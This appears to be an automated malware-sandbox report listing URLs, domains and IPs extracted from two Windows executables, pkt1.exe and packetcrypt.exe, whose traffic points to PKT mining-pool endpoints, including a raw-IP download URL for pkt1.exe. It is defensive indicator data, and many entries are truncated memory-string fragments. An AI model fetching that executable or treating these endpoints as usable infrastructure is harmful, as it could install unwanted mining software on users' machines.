http://pool.pkt.world/blk/submith	0%	Avira URL Cloud	safe
http://master.pkt.world/pay11	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json/	0%	Avira URL Cloud	safe
http://pool.pkt.world/master;	0%	Avira URL Cloud	safe
http://pool.pkt.world/master/blkinfo_526717b753447e06968a08abf68208310e1f5acaa1180a99cbda870ca2f0343	0%	Avira URL Cloud	safe
http://pool.pkd	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json1	0%	Avira URL Cloud	safe
http://pool.pkt.world/master/blkinfo_e21c206fb56ab02307270f6e5a7a0ada30138fb95f832f7d4b09d83d9cd3a8f	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json-	0%	Avira URL Cloud	safe
http://any.ah.pkt.worK	0%	Avira URL Cloud	safe
http://master.pkt.world/pay	0%	Avira URL Cloud	safe
http://pool.pkt.F	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json8	0%	Avira URL Cloud	safe
http://pool.pkt.worldC:	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json2	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterD	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterbmitn	0%	Avira URL Cloud	safe
http://any.ah.pkt.world/anns/submit?c	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submE	0%	Avira URL Cloud	safe
http://pool.pkt.world/master=2;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool.pkt.world	199.16.240.187	true	false		unknown
any.ah.pkt.world	199.16.240.205	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.27.51.244/pkt1.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7#	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/blk/submitK	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worldin	packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mono/linker/pull/2125.	System.Linq.Expressions.dll.4.dr	false		high
http://pool.pkt.world/blk/submit	packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submitL	packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2649923389.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2673224837.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2651717140.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2662607746.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/payg.json	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114266001.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103160808.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/info	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/config.jsonK	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterTz	packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master)	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/pay6	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submit;	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3814187859.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813889929.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/app-launch-failed	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/master&	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
https://github.com/clap-rs/clap/issues	packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://github.com/clap-rs/clap/issues#	pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://pool.pkt.world/master2	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-core-applaunch?	pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://master.pkt.world/payMT	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	pkt1.exe, 00000004.00000002.4110638077.000001DA4AEA2000.00000002.00000001.01000000.00000010.sdmp, pkt1.exe, 00000004.00000002.4154082225.00007FFE11EA1000.00000020.00000001.01000000.0000000A.sdmp, pkt1.exe, 00000004.00000002.4154239730.00007FFE11ED1000.00000020.00000001.01000000.00000009.sdmp, pkt1.exe, 00000004.00000002.4154368557.00007FFE1A501000.00000020.00000001.01000000.00000008.sdmp, pkt1.exe, 00000004.00000002.4146708699.00007FFE11511000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000004.00000002.4112102175.000001DA4D5A0000.00000004.00000020.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4110591486.000001DA4AE92000.00000002.00000001.01000000.0000000F.sdmp, pkt1.exe, 00000004.00000002.4153918296.00007FFE11BD1000.00000020.00000001.01000000.0000000B.sdmp, pkt1.exe, 00000004.00000002.4110702890.000001DA4AEB2000.00000002.00000001.01000000.00000011.sdmp, pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp, System.Diagnostics.TraceSource.dll.4.dr, System.Data.DataSetExtensions.dll.4.dr, System.Runtime.Loader.dll.4.dr, System.Net.Ping.dll.4.dr, System.ServiceModel.Web.dll.4.dr	false		high
https://github.com/clap-rs/clap/issues/home/runner/.cargo/registry/src/index.crates.io-6f17d22bba150	packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://master.pkt.wo	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D45000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submit(	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.json	packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3516516814.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2766217131.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2330920987.00000239E3F4B000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3314559971.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2234579921.00000239E3EC9000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2770879271.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2331175814.00000239E3F68000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771207181.00000239E401B000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F3E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103160808.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-warnings/	pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp, System.Net.Ping.dll.4.dr, System.Linq.Expressions.dll.4.dr	false		high
http://pool.pkt.world/blk/submit1	packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
https://github.com/dotnet/runtime/issues/71847	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
http://master.pkt.world/payA	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2649923389.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2673224837.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2651717140.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2662607746.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.jsonw	packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/binaryformatter	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	false		high
http://pool.pkt.world/config.jsony	packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c425	packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mono/linker/pull/649	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
http://pool.pkt.world/master.jsonX	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/blk/submit&	packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7	packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master.json	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/payg.json7	packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.wor	packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worldC:HOMEPATH=	packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master	packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master/blkinfo_1b2f0c4a3739221fbf80e36dad285b3f61b60e1ff8ab442582de1d9af7630b8	packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterT	packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world	pkt1.exe, 00000004.00000002.4110767901.000001DA4AED0000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4112163975.000001DA50000000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, pkt1.exe, 00000004.00000002.4112163975.000001DA50015000.00000004.00001000.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1266000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12FB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1240000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterdate=2fVS	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/download%s%sInstall	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
https://aka.ms/dotnet-illink/com	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	false		high
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e99409592	packetcrypt.exe, 00000006.00000003.3110476858.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690678950.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691697981.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3517453778.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3109839550.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3515565970.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691808111.00000239E3F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/pay=2c	packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master.jsonv	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/nativehostt	pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	false		high
http://pool.pkt.world/	packetcrypt.exe, 00000006.00000003.3110476858.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D45000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690678950.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691697981.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3517453778.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3109839550.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3515565970.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691808111.00000239E3F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submitm32	packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterdate=2	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/mastern	packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mono/linker/issues/378	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
http://pool.pkt.world/master9	packetcrypt.exe, 00000006.00000003.2234579921.00000239E3EC9000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3814187859.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813889929.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2331175814.00000239E3F68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/mastern1	packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/pay11	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submith	packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master;	packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2770968426.00000239E3F3A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2766217131.00000239E3F3A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771171413.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2785256145.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master/blkinfo_526717b753447e06968a08abf68208310e1f5acaa1180a99cbda870ca2f0343	packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
